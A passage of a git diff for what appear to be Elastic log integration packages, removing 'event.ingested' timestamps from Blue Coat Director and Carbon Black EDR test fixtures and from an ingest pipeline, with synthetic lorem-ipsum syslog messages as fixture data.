"2022-01-25T12:01:11.728265649Z" - }, "message": "anacron[654]: Updated timestamp for job rmagni to sit", "tags": [ "preserve_original_event" @@ -136,9 +103,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728266832Z" - }, "message": "dmd: : \u003c\u003ctenima.very-high\u003e Health state for metric\"seq3874.mail.domain\" \"quid\" changed to \"fug\", reason: \"success\"", "tags": [ "preserve_original_event" @@ -148,9 +112,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728267854Z" - }, "message": "auditd[2067]: Audit daemon rotating log files", "tags": [ "preserve_original_event" @@ -160,9 +121,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728268868Z" - }, "message": "pm[5969]: \u003c\u003ctquovol.very-high\u003e check_license_validity(), tae", "tags": [ "preserve_original_event" @@ -172,9 +130,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728269879Z" - }, "message": "logrotate: : ALERT exited abnormally with temUten", "tags": [ "preserve_original_event" @@ -184,9 +139,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728270901Z" - }, "message": "sshd: : \u003c\u003cdun.medium\u003e error: Bind to port Duisau on psum failed: failure", "tags": [ "preserve_original_event" @@ -196,9 +148,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728272036Z" - }, "message": "configd: : \u003c\u003cend.medium\u003e itaut@rveli: command: accept", "tags": [ "preserve_original_event" @@ -208,9 +157,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728273053Z" - }, "message": "authd: : \u003c\u003cluptat.low\u003e authd_signal_handler(), quam", "tags": [ "preserve_original_event" @@ -220,9 +166,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728274069Z" - }, "message": "xinetd[6547]: Started working: onproide available services", "tags": [ "preserve_original_event" @@ -232,9 +175,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728275081Z" - }, "message": "logrotate: : ALERT exited abnormally with tfug", "tags": [ "preserve_original_event" @@ -244,9 +184,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728276095Z" - }, "message": "heartbeat: : \u003c\u003curE.medium\u003e Processing command: deny", "tags": [ "preserve_original_event" @@ -256,9 +193,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728277109Z" - }, "message": "rsyslogd: : Warning: rehe", "tags": [ "preserve_original_event" @@ -268,9 +202,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728278125Z" - }, "message": "sshd: : \u003c\u003cstiae.medium\u003e error: Bind to port erc on amqu failed: unknown", "tags": [ "preserve_original_event" @@ -280,9 +211,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728279251Z" - }, "message": "ntpd[4515]: ntpd emp-r aperia", "tags": [ "preserve_original_event" @@ -292,9 +220,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728280270Z" - }, "message": "restorecond: : Reset file context run: vol", "tags": [ "preserve_original_event" @@ -304,9 +229,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728281301Z" - }, "message": "logrotate: : ALERT exited abnormally with mporain", "tags": [ "preserve_original_event" @@ -316,9 +238,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728282378Z" - }, "message": "heartbeat: : \u003c\u003cmpori.very-high\u003e connect: atu", "tags": [ "preserve_original_event" @@ -328,9 +247,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728283393Z" - }, "message": "cmd: : \u003c\u003ctexp.medium\u003e cmd starting adeseru", "tags": [ "preserve_original_event" @@ -340,9 +256,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728284404Z" - }, "message": "cli[7108]: \u003c\u003c-uam.low\u003e tmo@::fficiade:10.2.53.125 : CLI launched", "tags": [ "preserve_original_event" @@ -352,9 +265,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728285417Z" - }, "message": "pm[7061]: \u003c\u003cihilmo.very-high\u003e ntpd will start in tlabo", "tags": [ "preserve_original_event" @@ -364,9 +274,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728286428Z" - }, "message": "poller[795]: \u003c\u003coluptate.low\u003e Querying content system for job results.", "tags": [ "preserve_original_event" @@ -376,9 +283,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728287441Z" - }, "message": "runner[6134]: \u003c\u003cedo.very-high\u003e Processing command: allow", "tags": [ "preserve_original_event" @@ -388,9 +292,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728288449Z" - }, "message": "epmd: : epmd: epmd running orpor", "tags": [ "preserve_original_event" @@ -400,9 +301,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728289465Z" - }, "message": "runner[602]: \u003c\u003cemvel.very-high\u003e Failed to exec olup", "tags": [ "preserve_original_event" @@ -412,9 +310,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728290614Z" - }, "message": "shutdown[2807]: shutting down non", "tags": [ "preserve_original_event" @@ -424,9 +319,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728291646Z" - }, "message": "configd: : \u003c\u003cugiatnu.high\u003e sperna@sintocc: command: cancel", "tags": [ "preserve_original_event" @@ -436,9 +328,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728292656Z" - }, "message": "auditd[2986]: Audit daemon rotating log files", "tags": [ "preserve_original_event" @@ -448,9 +337,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728293669Z" - }, "message": "configd: : \u003c\u003cccaecat.medium\u003e CREATE onsequ", "tags": [ "preserve_original_event" @@ -460,9 +346,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728294680Z" - }, "message": "auditd[1243]: Audit daemon rotating log files", "tags": [ "preserve_original_event" @@ -472,9 +355,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728295695Z" - }, "message": "xinetd[6599]: Started working: naal available services", "tags": [ "preserve_original_event" @@ -484,9 +364,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728296707Z" - }, "message": "xinetd[5850]: Started working: rQu available services", "tags": [ "preserve_original_event" @@ -496,9 +373,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728297720Z" - }, "message": "heartbeat: : \u003c\u003cboree.low\u003e queips: undefined symbol: ncidi", "tags": [ "preserve_original_event" @@ -508,9 +382,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728298730Z" - }, "message": "authd: : \u003c\u003color.very-high\u003e authd_close(): npr", "tags": [ "preserve_original_event" @@ -520,9 +391,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728299740Z" - }, "message": "anacron[6373]: Anacron 1.3962 started on epre", "tags": [ "preserve_original_event" @@ -532,9 +400,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728300759Z" - }, "message": "cli[3979]: \u003c\u003c-iduntu.medium\u003e temUt@avol752.www5.test : Processing command accept", "tags": [ "preserve_original_event" @@ -544,9 +409,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728301773Z" - }, "message": "cmd: : \u003c\u003camc.medium\u003e cmd starting isiuta", "tags": [ "preserve_original_event" @@ -556,9 +418,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728302854Z" - }, "message": "sshd[5227]: dutp(psaquaea:taevita): pam_putenv: ameiusm", "tags": [ "preserve_original_event" @@ -568,9 +427,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728303864Z" - }, "message": "ccd: : \u003c\u003colab.low\u003e Device elitse6672.internal.localdomain: mquisno", "tags": [ "preserve_original_event" @@ -580,9 +436,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728304874Z" - }, "message": "runner[1859]: \u003c\u003ctasnulap.high\u003e Failed to exec umSe", "tags": [ "preserve_original_event" @@ -592,9 +445,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728305882Z" - }, "message": "shutdown[6110]: shutting down itau", "tags": [ "preserve_original_event" @@ -604,9 +454,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728306991Z" - }, "message": "sshd[2415]: PAM lorsita more authentication failure; dolore", "tags": [ "preserve_original_event" @@ -616,9 +463,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728308006Z" - }, "message": "rsyslogd: : Warning: tio", "tags": [ "preserve_original_event" @@ -628,9 +472,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728309020Z" - }, "message": "cli[802]: \u003c\u003c-gnaaliqu.very-high\u003e velillu@::cteturad:10.18.204.87 : Processing a secure command...", "tags": [ "preserve_original_event" @@ -640,9 +481,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728310051Z" - }, "message": "heartbeat: : \u003c\u003creprehe.high\u003e connect: inimveni", "tags": [ "preserve_original_event" @@ -652,9 +490,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728311079Z" - }, "message": "authd: : \u003c\u003clitani.low\u003e authd_close(): psumqu", "tags": [ "preserve_original_event" @@ -664,9 +499,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728312091Z" - }, "message": "runner[2558]: \u003c\u003cicabo.high\u003e Failed to exec edquiac", "tags": [ "preserve_original_event" @@ -676,9 +508,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728313111Z" - }, "message": "anacron[4538]: Updated timestamp for job remips to uisaute", "tags": [ "preserve_original_event" @@ -688,9 +517,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728314122Z" - }, "message": "auditd[6837]: Audit daemon rotating log files", "tags": [ "preserve_original_event" @@ -700,9 +526,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728315142Z" - }, "message": "pm[1493]: \u003c\u003cetdolor.high\u003e print_msg(), dic", "tags": [ "preserve_original_event" @@ -712,9 +535,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728316161Z" - }, "message": "configd: : \u003c\u003cavolupt.low\u003e Device \"itation4168.api.domain\" completed command(s) accept ;; CPL generated by Visual Policy Manager: isciv ;rroqu ; nofd ; dipisci", "tags": [ "preserve_original_event" @@ -724,9 +544,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728317174Z" - }, "message": "epmd: : epmd: invalid packet size (mquae)", "tags": [ "preserve_original_event" @@ -736,9 +553,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728318190Z" - }, "message": "runner[429]: \u003c\u003ccorpori.very-high\u003e File reading failed", "tags": [ "preserve_original_event" @@ -748,9 +562,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728319199Z" - }, "message": "shutdown[7595]: shutting down emqu", "tags": [ "preserve_original_event" @@ -760,9 +571,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728320212Z" - }, "message": "heartbeat: : \u003c\u003cleumiur.low\u003e The HB command is accept", "tags": [ "preserve_original_event" @@ -772,9 +580,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728321243Z" - }, "message": "authd: : \u003c\u003cest.very-high\u003e authd_signal_handler(), isetquas", "tags": [ "preserve_original_event" @@ -784,9 +589,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728322250Z" - }, "message": "authd: : \u003c\u003cpsaqua.medium\u003e authd_signal_handler(), gnaal", "tags": [ "preserve_original_event" @@ -796,9 +598,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728323319Z" - }, "message": "logrotate: : ALERT exited abnormally with voluptas", "tags": [ "preserve_original_event" @@ -808,9 +607,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728324333Z" - }, "message": "ntpd[627]: ntpd exiting on signal orin", "tags": [ "preserve_original_event" @@ -820,9 +616,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728325347Z" - }, "message": "restorecond: : Reset file context ecillu: mmodoc", "tags": [ "preserve_original_event" @@ -832,9 +625,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728326368Z" - }, "message": "cli[1140]: \u003c\u003c-abore.high\u003e modocon@ipsu3680.mail.test : Processing command: deny", "tags": [ "preserve_original_event" @@ -844,9 +634,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728327419Z" - }, "message": "sshd: : bad username mquisn", "tags": [ "preserve_original_event" @@ -856,9 +643,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728328474Z" - }, "message": "ntpd[1313]: ntpd derit-r orese", "tags": [ "preserve_original_event" @@ -868,9 +652,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728329505Z" - }, "message": "ccd: : \u003c\u003cleumiur.medium\u003e Device Communication Daemon online", "tags": [ "preserve_original_event" @@ -880,9 +661,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728330532Z" - }, "message": "rsyslogd: : Warning: moles", "tags": [ "preserve_original_event" @@ -892,9 +670,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728331697Z" - }, "message": "restorecond: : Reset file context olup: aco", "tags": [ "preserve_original_event" @@ -904,9 +679,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728332742Z" - }, "message": "shutdown[609]: shutting down ser", "tags": [ "preserve_original_event" @@ -916,9 +688,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728333765Z" - }, "message": "ntpd[2991]: ntpd orinrep-r quiavol", "tags": [ "preserve_original_event" @@ -928,9 +697,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728334775Z" - }, "message": "dmd: : \u003c\u003cquin.medium\u003e inserted device id = sBonor2001.www5.example and serial number = amc into DB", "tags": [ "preserve_original_event" @@ -940,9 +706,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728335819Z" - }, "message": "ccd: : \u003c\u003came.very-high\u003e ccd_handle_read_failure(), uid", "tags": [ "preserve_original_event" @@ -952,9 +715,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728336835Z" - }, "message": "cmd: : \u003c\u003cscivel.high\u003e cmd starting lmolesti", "tags": [ "preserve_original_event" @@ -964,9 +724,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728337844Z" - }, "message": "dmd: : \u003c\u003cemaperia.high\u003e inserted device id = ersp6625.internal.domain and serial number = seq into DB", "tags": [ "preserve_original_event" @@ -976,9 +733,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728338852Z" - }, "message": "cmd: : \u003c\u003ctanimid.medium\u003e cmd starting uipexe", "tags": [ "preserve_original_event" @@ -988,9 +742,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728339867Z" - }, "message": "heartbeat: : \u003c\u003core.low\u003e The HB command is cancel", "tags": [ "preserve_original_event" @@ -1000,9 +751,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728340895Z" - }, "message": "anacron[7360]: Normal exit tperspic", "tags": [ "preserve_original_event" @@ -1012,9 +760,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728341902Z" - }, "message": "dmd: : \u003c\u003cict.very-high\u003e Filter on (tetura) things. riosamni", "tags": [ "preserve_original_event" @@ -1024,9 +769,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728342980Z" - }, "message": "ccd: : \u003c\u003cumetMa.low\u003e Device eleumiu2454.api.local: tat", "tags": [ "preserve_original_event" @@ -1036,9 +778,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728343991Z" - }, "message": "schedulerd: : \u003c\u003clumqu.very-high\u003e System time changed, recomputing job run times.", "tags": [ "preserve_original_event" @@ -1048,9 +787,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728345003Z" - }, "message": "xinetd[3450]: Started working: aconsequ available services", "tags": [ "preserve_original_event" @@ -1060,9 +796,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728346014Z" - }, "message": "authd: : \u003c\u003csequat.high\u003e handle_authd unknown message =utemvel", "tags": [ "preserve_original_event" @@ -1072,9 +805,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728347054Z" - }, "message": "rsyslogd: : Warning: iusm", "tags": [ "preserve_original_event" @@ -1084,9 +814,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728348065Z" - }, "message": "ntpd[16]: time reset stquido", "tags": [ "preserve_original_event" @@ -1096,9 +823,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728349078Z" - }, "message": "ccd: : \u003c\u003caaliq.high\u003e Device olu5333.www.domain: orumSe", "tags": [ "preserve_original_event" @@ -1108,9 +832,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728350087Z" - }, "message": "anacron[80]: Normal exit ici", "tags": [ "preserve_original_event" @@ -1120,9 +841,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728351111Z" - }, "message": "ntpd[7612]: kernel time sync enabled nturmag", "tags": [ "preserve_original_event" @@ -1132,9 +850,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728352127Z" - }, "message": "cli[7128]: eseruntm(lpaquiof:oloreeu): pam_putenv: olor", "tags": [ "preserve_original_event" @@ -1144,9 +859,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728353159Z" - }, "message": "schedulerd: : \u003c\u003cici.very-high\u003e Executing Job \"tquo\" execution iatnu", "tags": [ "preserve_original_event" @@ -1156,9 +868,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728354179Z" - }, "message": "logrotate: : ALERT exited abnormally with ntut", "tags": [ "preserve_original_event" @@ -1168,9 +877,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728355187Z" - }, "message": "poller[7151]: \u003c\u003cess.high\u003e Querying content system for job results.", "tags": [ "preserve_original_event" @@ -1180,9 +886,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728356196Z" - }, "message": "ntpd[2314]: ntpd litanim-r rQuisaut", "tags": [ "preserve_original_event" @@ -1192,9 +895,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728357211Z" - }, "message": "heartbeat: : \u003c\u003cmetco.high\u003e Processing command: block", "tags": [ "preserve_original_event" diff --git a/packages/bluecoat/data_stream/director/elasticsearch/ingest_pipeline/default.yml b/packages/bluecoat/data_stream/director/elasticsearch/ingest_pipeline/default.yml index 939ce13fe60..fcf40dc1b13 100644 --- a/packages/bluecoat/data_stream/director/elasticsearch/ingest_pipeline/default.yml +++ b/packages/bluecoat/data_stream/director/elasticsearch/ingest_pipeline/default.yml @@ -2,10 +2,6 @@ description: Pipeline for Blue Coat Director processors: - # ECS event.ingested - - set: - field: event.ingested - value: '{{_ingest.timestamp}}' - set: field: ecs.version value: '8.2.0' diff --git a/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json b/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json index fbd1747776d..640dae78bfa 100644 --- a/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json +++ b/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json @@ -22,7 +22,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120890521Z", "kind": "event", "type": [ "info" @@ -61,7 +60,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120892622Z", "kind": "event", "type": [ "info" @@ -98,7 +96,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120893573Z", "kind": "event", "type": [ "info" @@ -137,7 +134,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120894349Z", "kind": "event", "type": [ "info" @@ -176,7 +172,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120895100Z", "kind": "event", "type": [ "info" @@ -213,7 +208,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120895848Z", "kind": "event", "type": [ "info" @@ -252,7 +246,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120896593Z", "kind": "event", "type": [ "info" @@ -291,7 +284,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120897339Z", "kind": "event", "type": [ "info" @@ -330,7 +322,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120898068Z", "kind": "event", "type": [ "info" @@ -374,7 +365,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120898801Z", "kind": "event" }, "host": { @@ -445,7 +435,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120899541Z", "kind": "event", "type": [ "info" @@ -488,7 +477,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120900456Z", "kind": "event", "type": [ "info" @@ -546,7 +534,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120901222Z", "kind": "event" }, "file": { @@ -610,7 +597,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120901965Z", "kind": "event", "type": [ "info" @@ -651,7 +637,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120902705Z", "kind": "event" }, "observer": { @@ -687,7 +672,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120903445Z", "kind": "event", "type": [ "info" @@ -722,7 +706,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120904295Z", "kind": "event" }, "host": { @@ -772,7 +755,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120905032Z", "kind": "event", "type": [ "info" @@ -813,7 +795,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120905768Z", "kind": "event" }, "observer": { @@ -849,7 +830,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120906498Z", "kind": "event", "type": [ "info" @@ -899,7 +879,6 @@ "category": [ "network" ], - "ingested": "2022-01-25T07:41:27.120907242Z", "kind": "event", "type": [ "connection", @@ -935,7 +914,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120907985Z", "kind": "event" }, "host": { @@ -983,7 +961,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120908738Z", "kind": "event", "type": [ "info" @@ -1024,7 +1001,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120909579Z", "kind": "event" }, "observer": { @@ -1060,7 +1036,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120910328Z", "kind": "event", "type": [ "info" @@ -1111,7 +1086,6 @@ "category": [ "network" ], - "ingested": "2022-01-25T07:41:27.120911068Z", "kind": "event", "type": [ "connection", @@ -1160,7 +1134,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120911807Z", "kind": "event" }, "host": { @@ -1248,7 +1221,6 @@ "category": [ "registry" ], - "ingested": "2022-01-25T07:41:27.120912538Z", "kind": "event", "type": [ "change" @@ -1286,7 +1258,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120913263Z", "kind": "event", "type": [ "info" @@ -1327,7 +1298,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120914003Z", "kind": "event" }, "observer": { @@ -1365,7 +1335,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120914730Z", "kind": "event", "type": [ "info" @@ -1416,7 +1385,6 @@ "category": [ "network" ], - "ingested": "2022-01-25T07:41:27.120915476Z", "kind": "event", "type": [ "connection", @@ -1479,7 +1447,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120916203Z", "kind": "event" }, "file": { @@ -1559,7 +1526,6 @@ "category": [ "registry" ], - "ingested": "2022-01-25T07:41:27.120916931Z", "kind": "event", "type": [ "change" @@ -1597,7 +1563,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120917751Z", "kind": "event", "type": [ "info" @@ -1635,7 +1600,6 @@ "process", "driver" ], - "ingested": "2022-01-25T07:41:27.120918479Z", "kind": "event", "type": [ "info" @@ -1676,7 +1640,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120919209Z", "kind": "event" }, "observer": { @@ -1714,7 +1677,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120919938Z", "kind": "event", "type": [ "info" @@ -1767,7 +1729,6 @@ "category": [ "network" ], - "ingested": "2022-01-25T07:41:27.120920671Z", "kind": "event", "type": [ "connection", @@ -1825,7 +1786,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120921399Z", "kind": "event" }, "host": { @@ -1900,7 +1860,6 @@ "category": [ "registry" ], - "ingested": "2022-01-25T07:41:27.120922143Z", "kind": "event", "type": [ "change" @@ -1938,7 +1897,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120922890Z", "kind": "event", "type": [ "info" @@ -1976,7 +1934,6 @@ "process", "driver" ], - "ingested": "2022-01-25T07:41:27.120923633Z", "kind": "event", "type": [ "info" @@ -2017,7 +1974,6 @@ "category": [ "host" ], - "ingested": "2022-01-25T07:41:27.120924363Z", "kind": "event", "type": [ "info" @@ -2061,7 +2017,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120925100Z", "kind": "event" }, "observer": { @@ -2099,7 +2054,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120925842Z", "kind": "event", "type": [ "info" @@ -2150,7 +2104,6 @@ "category": [ "network" ], - "ingested": "2022-01-25T07:41:27.120926580Z", "kind": "event", "type": [ "connection", @@ -2216,7 +2169,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120927323Z", "kind": "event" }, "file": { @@ -2281,7 +2233,6 @@ "category": [ "registry" ], - "ingested": "2022-01-25T07:41:27.120928054Z", "kind": "event", "type": [ "change" @@ -2319,7 +2270,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120928817Z", "kind": "event", "type": [ "info" @@ -2357,7 +2307,6 @@ "process", "driver" ], - "ingested": "2022-01-25T07:41:27.120929659Z", "kind": "event", "type": [ "info" @@ -2398,7 +2347,6 @@ "category": [ "host" ], - "ingested": "2022-01-25T07:41:27.120930392Z", "kind": "event", "type": [ "info" @@ -2442,7 +2390,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120931124Z", "kind": "event" }, "observer": { @@ -2488,7 +2435,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120931882Z", "kind": "event", "type": [ "start", @@ -2533,7 +2479,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120932619Z", "kind": "event", "type": [ "info" @@ -2584,7 +2529,6 @@ "category": [ "network" ], - "ingested": "2022-01-25T07:41:27.120933365Z", "kind": "event", "type": [ "connection", @@ -2618,7 +2562,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120934112Z", "kind": "event" }, "observer": { @@ -2662,7 +2605,6 @@ "category": [ "registry" ], 